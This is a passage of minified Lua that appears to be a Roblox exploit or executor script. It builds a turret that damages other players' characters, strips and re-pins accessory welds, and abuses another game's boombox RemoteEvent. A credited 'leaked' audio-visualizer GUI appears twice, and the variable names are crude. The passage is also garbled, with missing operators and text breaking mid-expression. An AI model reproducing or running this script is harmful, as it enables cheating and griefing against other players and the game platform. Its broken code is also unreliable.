grey"),V3(1,2,1),"Plastic","Block")seatattachment3x=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatatball3=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,2,2),"Plastic","Sphere")seatattachment4=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")seatattachment4x=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,2,1),"Plastic","Block")Ball=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,2,2),"Plastic","Sphere")handp=Part(mod,true,true,0,0,BN("Medium grey"),V3(0.321,1.992,0.77),"Plastic","Block")Handle=Part(mod,true,true,0,0,BN("Medium grey"),V3(0.321,1.992,0.77),"Plastic","Block")Barrel=Part(mod,true,true,0,0,BN("Medium grey"),V3(2,4,2),"Plastic","Block")Barrelx=Part(mod,true,true,0,0,BN("Medium grey"),V3(1,1,1),"Plastic","Block")pit=Part(mod,true,true,0,0,BN("Black"),V3(1,1.2,1),"Plastic","Block")function Search(s1,s2,rg)function Find(s1,s2,rg)for U,j in pairs(s1:GetChildren())do Search(j,s2,rg)Count=0;for U,Humanoid in pairs(j:GetChildren())do if Humanoid:IsA("Humanoid")then Count=Count+1 end end;if j:IsA("Model")and Count>0 and j:FindFirstChild("Torso")~=nil then if(j:FindFirstChild("Torso").Position-s2.Position).magnitude100000 then Humanoid.MaxHealth=100;Humanoid.Health=100 end;Humanoid:TakeDamage(math.random(50,90))end end end end end end;Find(s1,s2,rg)end;s=me.Character.Torso.CFrame;TurretFace=function(eS)base.CFrame=CN(s.X,s.Y-2.5,s.Z+10)p1.CFrame=base.CFrame*CN(0,2.5,0)seat.CFrame=CN(base.CFrame.X,base.CFrame.Y+3.5,base.CFrame.Z)seat.CFrame=CN(seat.Position,eS)seatb.CFrame=seat.CFrame*CN(0,1.25,1.25)*CA(MR(15),0,0)seatattachment.CFrame=seatb.CFrame*CN(0,0,1)*CA(MR(90),0,0)seatattachmentx.CFrame=seatb.CFrame*CN(0,0,3)*CA(MR(90),0,0)seatatball1.CFrame=seatattachment.CFrame*CN(0,3,0)seatattachment2.CFrame=seatatball1.CFrame*CN(0,-0.5,-1.5)*CA(MR(65),0,0)seatattachment2x.CFrame=seatatball1.CFrame*CN(0,-1.2,-3)*CA(MR(65),0,0)seatatball2.CFrame=seatattachment2.CFrame*CN(0,-2.95,0)seatattachment3.CFrame=seatatball2.CFrame*CN(0,-0.75,1.5)*CA(MR(-65),0,0)seatattachment3x.CFrame=seatatball2.CFrame*CN(0,-1.566,3.25)*CA(MR(-65),0,0)seatatball3.CFrame=seatattachment3.CFrame*CN(0,-3.5,0)seatattachment4.CFrame=seatatball3.CFrame*CN(0,-.3,1.5)*CA(MR(-80),0,0)seatattachment4x.CFrame=seatatball3.CFrame*CN(0,-.566,3)*CA(MR(-80),0,0)Ball.CFrame=seatattachment4.CFrame*CN(0,-3,0)handp.CFrame=Ball.CFrame*CN(0,0.5,0.75)*ca(rd(65),0,0)Handle.CFrame=handp.CFrame*CN(0,1,0)*CA(0,0,MR(90))Barrel.CFrame=seat.CFrame*CN(0,2,-4.25)*CA(MR(90),0,0)Barrelx.CFrame=seat.CFrame*CN(0,2,-4.25)*CA(MR(90),0,0)pit.CFrame=Barrel.CFrame*CN(0,-2.01,0)end;q=function(f)CR(CC(function()f()end))end;qi=function(s4)local s5=it(s4[1],s4[2])table.foreach(s4,function(s6,s7)if s6~=1 and s6~=2 then s5[s6]=s7 end end)return s5 end;DetectSurface=function(pos,ec)local s8=nil;local s9=ec.CFrame;local sa=s9:pointToObjectSpace(pos)local sb=ec.Size;local sc=ec.Shape;if sc==Enum.PartType.Ball or sc==Enum.PartType.Cylinder then s8={"Anything",CN(s9.p,pos)*CN(0,0,-(s9.p-pos).magnitude+0.12)*CA(MR(-90),0,0)}elseif sa.Y>sb.Y/2-0.01 then s8={"Top",CA(0,0,0)}elseif sa.Y<-(sb.Y/2-0.01)then s8={"Bottom",CA(-math.pi,0,0)}elseif sa.X>sb.X/2-0.01 then s8={"Right",CA(0,0,MR(-90))}elseif sa.X<-(sb.X/2-0.01)then s8={"Left",CA(0,0,MR(90))}elseif sa.Z>sb.Z/2-0.01 then s8={"Back",CA(MR(90),0,0)}elseif sa.Z<-(sb.Z/2-0.01)then s8={"Front",CA(MR(-90),0,0)}end;return s8 end;function Trail(sd,ln,se,px,sf,pE)q(function()local sg=(sd.CFrame*pE).p;for T=1,ln do local sh=(sd.CFrame*pE).p;local gO=(sg-sh).magnitude;local si=Part(sd,false,false,0.5,0.15,BN("White"),v3(0,0,0),"Plastic")si.Name="Trail"si.Anchored=true;si.CFrame=cn(sg,sh)si.CFrame=si.CFrame+si.CFrame.lookVector*gO/2;local sj=it("CylinderMesh",si)sj.Scale=v3(5*sf,gO*5,5*sf)q(function()for T=5*sf,0,-5*sf/10 do sj.Scale=v3(T,gO*5,T)wait()end;si:Remove''end)si.CFrame=si.CFrame*ca(rd(90),0,0)sg=sh;wait(se)end end)end;local function sk(ec)if ec:FindFirstChild("BodyForce")then return end;local pg=Instance.new("BodyForce")pg.Force=ec:GetMass()*Vector3.new(0,Workspace.Gravity,0)pg.Parent=ec end;TurretShot=function(sl)q(function()local sm=Part(mod,true,true,0,0,BN(Colors[math.random(1,#Colors)]),V3(1,1,1),"Plastic")local sn=it("SpecialMesh",sm)sn.MeshId=Crown;sm.CFrame=pit.CFrame*cn(0,-1,-0.25)*ca(0,0,rd(180))sn.Scale=v3(1.25,2,1.25)for T=0,1,0.1 do sm.CFrame=pit.CFrame*cn(0,-1-T/2,-0.25)*ca(0,0,rd(180))sm.Transparency=T;sn.Scale=v3(1+T*0.75,2-T*0.25,1+T*0.75)wait()end;sm:Remove()end)q(function()local speed=10;local sp=Part(mod,true,true,0,0,BN("Really black"),V3(0.6,1.5,0.6),"Plastic","Cylinder")sp.CFrame=sl*CN(0,2.8+MRA(0,30)/10,0)q(function()bb2=sp:Clone()bb2.Parent=workspace.CurrentCamera;while wait()do pcall(function()bb2.CFrame=sp.CFrame end)end end)wait()Trail(sp,100,0,BN("White"),1,CN(0,0,0))for T=1,math.huge do sp.CFrame=sp.CFrame*CN(0,speed,0)*CA(MR(-0.2),0,0)bhit,bpos=ray(sp.Position,sp.Position-(sp.CFrame*CN(0,-1,0)).p)if bhit and bpos and(bpos-sp.Position).magnitude1 then sz=sz+j7 else j7=1;sy=BrickColor.Random()end end;local sA=rj[sz]local sB=sv[sz]sA.BrickColor=BrickColor.Random()sB.BrickColor=BrickColor.Random()sw=sound.PlaybackLoudness/500;sA.Size=Vector3.new(sw,sw,0.2)sB.Size=Vector3.new(sw,sw,0.2)wait()sA.BrickColor=sy;sB.BrickColor=sy end end)game:GetService("RunService").RenderStepped:connect(function()for T=1,#rj do if T==1 then rj[T].CFrame=rj[T].CFrame:lerp(game:GetService("Players").LocalPlayer.Character.Torso.CFrame,0.5)else rj[T].CFrame=rj[T].CFrame:lerp(rj[T-1].CFrame*CFrame.Angles(-sw/piss,math.sin(-sw/cum),0)*CFrame.new(0,0,2),0.6)end end;for T=1,#sv do if T==1 then sv[T].CFrame=sv[T].CFrame:lerp(game:GetService("Players").LocalPlayer.Character.Torso.CFrame,0.9)else sv[T].CFrame=sv[T].CFrame:lerp(sv[T-1].CFrame*CFrame.Angles(-sw/20,math.sin(sw/50),0)*CFrame.new(0,0,0.15),0.8)end end end)sx.KeyDown:connect(function(dr)if dr=='t'then cum=-2;piss=5 end;if dr=='r'then cum=50000;piss=2 end;if dr=='e'then cum=2;piss=5 end end)local sC=Instance.new("ScreenGui")local jI=Instance.new("Frame")local sD=Instance.new("TextBox")local sE=Instance.new("TextButton")local sF=Instance.new("TextBox")local sG=Instance.new("TextBox")local sH=Instance.new("TextButton")local sI=Instance.new("TextButton")local sJ=Instance.new("TextLabel")local sK=Instance.new("TextButton")local sL=Instance.new("TextButton")local sM=Instance.new("TextButton")local sN=Instance.new("TextButton")sC.Name="visualizergui"sC.Parent=game:GetService("Players").LocalPlayer.PlayerGui;jI.Parent=sC;jI.BackgroundColor3=Color3.new(0.701961,0.952941,1)jI.BackgroundTransparency=0.20000000298023;jI.BorderColor3=Color3.new(0.211765,0.329412,0.415686)jI.BorderSizePixel=8;jI.Position=UDim2.new(0,51,0,213)jI.Size=UDim2.new(0,418,0,213)jI.Active=true;jI.Draggable=true;jI.Visible=false;sD.Name="idvalue"sD.Parent=jI;sD.BackgroundColor3=Color3.new(0.666667,1,1)sD.BackgroundTransparency=0.5;sD.Size=UDim2.new(0,418,0,50)sD.Font=Enum.Font.Fantasy;sD.FontSize=Enum.FontSize.Size24;sD.Text="Put ID plz"sD.TextSize=24;sE.Name="play"sE.Parent=jI;sE.BackgroundColor3=Color3.new(0.666667,1,1)sE.BackgroundTransparency=0.44999998807907;sE.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sE.BorderSizePixel=3;sE.Position=UDim2.new(0,9,0,82)sE.Size=UDim2.new(0,117,0,50)sE.Font=Enum.Font.SourceSans;sE.FontSize=Enum.FontSize.Size28;sE.Text="Play"sE.TextSize=28;sF.Name="volume"sF.Parent=jI;sF.BackgroundColor3=Color3.new(0.666667,1,1)sF.BackgroundTransparency=0.44999998807907;sF.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sF.BorderSizePixel=3;sF.Position=UDim2.new(0,151,0,82)sF.Size=UDim2.new(0,117,0,50)sF.Font=Enum.Font.SourceSans;sF.FontSize=Enum.FontSize.Size28;sF.Text="Volume"sF.TextSize=28;sG.Name="pitch"sG.Parent=jI;sG.BackgroundColor3=Color3.new(0.666667,1,1)sG.BackgroundTransparency=0.44999998807907;sG.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sG.BorderSizePixel=3;sG.Position=UDim2.new(0,291,0,82)sG.Size=UDim2.new(0,117,0,50)sG.Font=Enum.Font.SourceSans;sG.FontSize=Enum.FontSize.Size28;sG.Text="Pitch"sG.TextSize=28;sH.Name="close"sH.Parent=jI;sH.BackgroundColor3=Color3.new(1,0,0.0156863)sH.BackgroundTransparency=0.40000000596046;sH.Position=UDim2.new(0,393,0,190)sH.Size=UDim2.new(0,25,0,23)sH.Font=Enum.Font.SourceSans;sH.FontSize=Enum.FontSize.Size28;sH.Text="X"sH.TextSize=28;sI.Name="min"sI.Parent=jI;sI.BackgroundColor3=Color3.new(0.286275,0.286275,1)sI.BackgroundTransparency=0.40000000596046;sI.Position=UDim2.new(0,357,0,190)sI.Size=UDim2.new(0,25,0,23)sI.Font=Enum.Font.SourceSans;sI.FontSize=Enum.FontSize.Size36;sI.Text="-"sI.TextSize=36;sJ.Name="credits"sJ.Parent=jI;sJ.BackgroundColor3=Color3.new(1,1,1)sJ.BackgroundTransparency=1;sJ.Position=UDim2.new(0,0,0,161)sJ.Size=UDim2.new(0,200,0,52)sJ.Font=Enum.Font.SourceSans;sJ.FontSize=Enum.FontSize.Size14;sJ.Text="credits to mr steal yo bork for gui"sJ.TextSize=14;sJ.TextWrapped=true;sK.Name="open"sK.Parent=sC;sK.BackgroundColor3=Color3.new(0.666667,1,1)sK.BackgroundTransparency=0.44999998807907;sK.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sK.BorderSizePixel=3;sK.Position=UDim2.new(0,0,0,400)sK.Size=UDim2.new(0,59,0,50)sK.Font=Enum.Font.SourceSans;sK.FontSize=Enum.FontSize.Size28;sK.Text="Open"sK.TextSize=28;sK.Visible=false;sL.Name="set2"sL.Parent=jI;sL.BackgroundColor3=Color3.new(0.666667,1,1)sL.BackgroundTransparency=0.44999998807907;sL.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sL.BorderSizePixel=3;sL.Position=UDim2.new(0,325,0,136)sL.Size=UDim2.new(0,55,0,25)sL.Font=Enum.Font.SourceSans;sL.FontSize=Enum.FontSize.Size24;sL.Text="Set"sL.TextSize=24;sL.TextWrapped=true;sM.Name="set1"sM.Parent=jI;sM.BackgroundColor3=Color3.new(0.666667,1,1)sM.BackgroundTransparency=0.44999998807907;sM.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sM.BorderSizePixel=3;sM.Position=UDim2.new(0,181,0,136)sM.Size=UDim2.new(0,55,0,25)sM.Font=Enum.Font.SourceSans;sM.FontSize=Enum.FontSize.Size24;sM.Text="Set"sM.TextSize=24;sM.TextWrapped=true;sN.Name="loop"sN.Parent=jI;sN.BackgroundColor3=Color3.new(0.666667,1,1)sN.BackgroundTransparency=0.44999998807907;sN.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sN.BorderSizePixel=3;sN.Position=UDim2.new(0,241,0,188)sN.Size=UDim2.new(0,84,0,25)sN.Font=Enum.Font.SourceSans;sN.FontSize=Enum.FontSize.Size18;sN.Text="Loop : OFF"sN.TextSize=18;sN.TextWrapped=true;function start()wait(0.5)jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)end;if game:GetService("Players").LocalPlayer.Character then start()else print'character not found plz try again XD'end;function minimize()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sJ.Text=""sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""sM.Text=""sL.Text=""sN.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)jI.Visible=false;sK.Visible=true end;function show()sK.Visible=false;jI.Position=UDim2.new(0,-500,0,400)jI.Visible=true;sJ.Text="credits to me for gui, i didn't make the visualizer credits to whoever leaked it or made it."sI.Text="-"sH.Text="X"sE.Text="Play"sG.Text="Pitch"sF.Text="Volume"sD.Text="Put ID plz"sM.Text="Set"sL.Text="Set"sN.Text="Loop : OFF"jI:TweenSize(UDim2.new(0,418,0,213),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,200,0,52),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,25,0,23),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,418,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,117,0,50),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,84,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,55,0,25),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)end;function exitdatshit()jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,1)sJ.Text=""sI.Text=""sH.Text=""sE.Text=""sG.Text=""sF.Text=""sD.Text=""jI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sJ:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sI:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sH:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sD:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sF:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sE:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sG:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sM:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sL:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)sN:TweenSize(UDim2.new(0,0,0,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)jI:TweenPosition(UDim2.new(0,0,0,400),Enum.EasingDirection.InOut,Enum.EasingStyle.Quint,0.5)wait(0.5)sC:Destroy()end;wait(1)sI.MouseButton1Down:connect(function()minimize()end)sK.MouseButton1Down:connect(function()show()end)sH.MouseButton1Down:connect(function()exitdatshit()end)sM.MouseButton1Down:connect(function()sound.Volume=sF.Text end)sL.MouseButton1Down:connect(function()sound.Pitch=sG.Text end)sE.MouseButton1Down:connect(function()sound.TimePosition=0;sound.SoundId="rbxassetid://"..sD.Text;game:GetService("Players").LocalPlayer.Character.SuperFlyGoldBoombox.Remote:FireServer("PlaySong",sD.text)end)sN.MouseButton1Down:connect(function()if sN.Text=="Loop : OFF"then sound.Looped=true;sN.Text="Loop : ON"else sound.Looped=false;sN.Text="Loop : OFF"end end)Character["Torso"].Part.Name="Part"Character["Torso"].Part.Name="Part1"Character["Torso"].Part.Name="Part2"Character["Torso"].Part.Name="Part3"Character["Torso"].Part.Name="Part4"Character["Torso"].Part.Name="Part5"Character["Torso"].Part.Name="Part6"Character["Torso"].Part.Name="Part7"Character["Torso"].Part.Name="Part8"Character["Torso"].Part.Name="Part9"W(R.one.Handle,Character["Torso"].Part)W(R.two.Handle,Character["Torso"].Part1)W(R.three.Handle,Character["Torso"].Part2)W(R.four.Handle,Character["Torso"].Part3)W(R.five.Handle,Character["Torso"].Part4)W(R.six.Handle,Character["Torso"].Part5)W(R.seven.Handle,Character["Torso"].Part6)W(R.eight.Handle,Character["Torso"].Part7)W(R.nine.Handle,Character["Torso"].Part8)W(R.ten.Handle,Character["Torso"].Part9)R.one.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.two.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.three.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.four.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.five.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.six.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.seven.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.eight.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.nine.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.ten.Handle.Attachment.Rotation=Vector3.new(0,0,0)Character:WaitForChild("Torso").Part:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part1:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part2:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part3:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part4:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part5:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part6:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part7:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part8:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part9:FindFirstChild("Attachment").Name="Attachment1"Character:WaitForChild("Torso").Part.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part1.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part2.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part3.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part4.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part5.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part6.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part7.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part8.Attachment1.Position=Vector3.new(0,0,0.75)Character:WaitForChild("Torso").Part9.Attachment1.Position=Vector3.new(0,0,0.75)end)end;function Clickey16()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={one=Character:WaitForChild("FireMohawk"),two=Character:WaitForChild("Vets Day Cap"),three=Character:WaitForChild("Robloxclassicred"),four=Character:WaitForChild("Kate Hair"),five=Character:WaitForChild("Pink Hair"),six=Character:WaitForChild("LavanderHair"),seven=Character:WaitForChild("Pal Hair"),eight=Character:WaitForChild("Hat1"),nine=Character:WaitForChild("BlockheadBaseballCap"),ten=Character:WaitForChild("Necklace")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;local rj={}local sv={}local j7=1;local sw=0;local sx=Player:GetMouse()cum=2;piss=5;shit=0.6;local sy=BrickColor.new("Black")for T=1,10 do local p=Instance.new("Part",game:GetService("Players").LocalPlayer.Character.Torso)p.Size=Vector3.new(0.2,0.2,0.2)p.Anchored=true;p.CanCollide=false;p.Transparency=1;p.Material="Neon"p.Position=game:GetService("Players").LocalPlayer.Character.Torso.Position;table.insert(rj,p)end;for T=1,10 do local p=Instance.new("Part",game:GetService("Players").LocalPlayer.Character.Torso)p.Size=Vector3.new(0.2,0.2,0.2)p.Anchored=true;p.CanCollide=false;p.Transparency=1;p.Material="Neon"p.Position=game:GetService("Players").LocalPlayer.Character.Torso.Position;table.insert(sv,p)end;local sound=Instance.new("Sound",game:GetService("Players").LocalPlayer.Character.Torso)sound.SoundId="rbxassetid://0"sound.Volume=0;sound:Play()spawn(function()local sz=0;while true do if j7==1 then if sz<#rj then sz=sz+j7 else j7=-1;sy=BrickColor.Random()end elseif j7==-1 then if sz>1 then sz=sz+j7 else j7=1;sy=BrickColor.Random()end end;local sA=rj[sz]local sB=sv[sz]sA.BrickColor=BrickColor.Random()sB.BrickColor=BrickColor.Random()sw=sound.PlaybackLoudness/500;sA.Size=Vector3.new(sw,sw,0.2)sB.Size=Vector3.new(sw,sw,0.2)wait()sA.BrickColor=sy;sB.BrickColor=sy end end)game:GetService("RunService").RenderStepped:connect(function()for T=1,#rj do if T==1 then rj[T].CFrame=rj[T].CFrame:lerp(game:GetService("Players").LocalPlayer.Character.Torso.CFrame,0.5)else rj[T].CFrame=rj[T].CFrame:lerp(rj[T-1].CFrame*CFrame.Angles(-sw/piss,math.sin(-sw/cum),0)*CFrame.new(0,0,2),shit)end end;for T=1,#sv do if T==1 then sv[T].CFrame=sv[T].CFrame:lerp(game:GetService("Players").LocalPlayer.Character.Torso.CFrame,0.9)else sv[T].CFrame=sv[T].CFrame:lerp(sv[T-1].CFrame*CFrame.Angles(-sw/20,math.sin(sw/50),0)*CFrame.new(0,0,0.15),0.8)end end end)sx.KeyDown:connect(function(dr)if dr=='t'then cum=-2;piss=5 end;if dr=='r'then cum=50000;piss=2 end;if dr=='e'then cum=2;piss=5 end;if dr=='z'then shit=shit+0.05 end;if dr=='x'then shit=shit-0.05 end;if dr=='c'then cum=cum+0.5 end;if dr=='v'then cum=cum-0.5 end end)local sC=Instance.new("ScreenGui")local jI=Instance.new("Frame")local sD=Instance.new("TextBox")local sE=Instance.new("TextButton")local sF=Instance.new("TextBox")local sG=Instance.new("TextBox")local sH=Instance.new("TextButton")local sI=Instance.new("TextButton")local sJ=Instance.new("TextLabel")local sK=Instance.new("TextButton")local sL=Instance.new("TextButton")local sM=Instance.new("TextButton")local sN=Instance.new("TextButton")sC.Name="visualizergui"sC.Parent=game:GetService("Players").LocalPlayer.PlayerGui;jI.Parent=sC;jI.BackgroundColor3=Color3.new(0.701961,0.952941,1)jI.BackgroundTransparency=0.20000000298023;jI.BorderColor3=Color3.new(0.211765,0.329412,0.415686)jI.BorderSizePixel=8;jI.Position=UDim2.new(0,51,0,213)jI.Size=UDim2.new(0,418,0,213)jI.Active=true;jI.Draggable=true;jI.Visible=false;sD.Name="idvalue"sD.Parent=jI;sD.BackgroundColor3=Color3.new(0.666667,1,1)sD.BackgroundTransparency=0.5;sD.Size=UDim2.new(0,418,0,50)sD.Font=Enum.Font.Fantasy;sD.FontSize=Enum.FontSize.Size24;sD.Text="Put ID plz"sD.TextSize=24;sE.Name="play"sE.Parent=jI;sE.BackgroundColor3=Color3.new(0.666667,1,1)sE.BackgroundTransparency=0.44999998807907;sE.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sE.BorderSizePixel=3;sE.Position=UDim2.new(0,9,0,82)sE.Size=UDim2.new(0,117,0,50)sE.Font=Enum.Font.SourceSans;sE.FontSize=Enum.FontSize.Size28;sE.Text="Play"sE.TextSize=28;sF.Name="volume"sF.Parent=jI;sF.BackgroundColor3=Color3.new(0.666667,1,1)sF.BackgroundTransparency=0.44999998807907;sF.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sF.BorderSizePixel=3;sF.Position=UDim2.new(0,151,0,82)sF.Size=UDim2.new(0,117,0,50)sF.Font=Enum.Font.SourceSans;sF.FontSize=Enum.FontSize.Size28;sF.Text="Volume"sF.TextSize=28;sG.Name="pitch"sG.Parent=jI;sG.BackgroundColor3=Color3.new(0.666667,1,1)sG.BackgroundTransparency=0.44999998807907;sG.BorderColor3=Color3.new(0.207843,0.0901961,0.0705882)sG.BorderSizePixel=3;sG.Position=UDim2.new(0,291,0,82)sG.Size=UDim2.new(0,117,0,50)sG.Font=Enum.Font.SourceSans;sG.FontSize=Enum.FontSize.Size28;sG.Text="Pitch"sG.TextSize=28;sH.Name="close"sH.Parent=jI;sH.BackgroundColor3=Color3.new(1,0,0.0156863)sH.BackgroundTransparency=0.40000000596046;sH.Position=UDim2.new(0,393,0,190)sH.Size=UDim2.new(0,25,0,23)sH.Font=Enum.Font.SourceSans;sH.FontSize=Enum.FontSize.Size28;sH.Text="X"sH.TextSize=28;sI.Name="min"sI.Parent=jI;sI.BackgroundColor3=Color3.new(0.286275,0.286275,1)sI.BackgroundTransparency=0.40000000596046;sI.Position=UDim2.new(0,357,0,190)sI.Size=UDim2.new(0,25,0,23)sI.Font=Enum.Font.SourceSans;sI.FontSize=Enum.FontSize.Size36;sI.Text="-"sI.TextSize=36;sJ.Name="credits"sJ.Parent=jI;sJ.BackgroundColor3=Color3.new(1,1,1)sJ.BackgroundTransparency=1;sJ.Position=UDim2.new(0,0,0,161)sJ.Size=UDim2.new(0,200,0,52)sJ.Font=Enum.Font.SourceSans;sJ.FontSize=Enum.FontSize.Size14;sJ.Text="credits to mr steal yo bork for 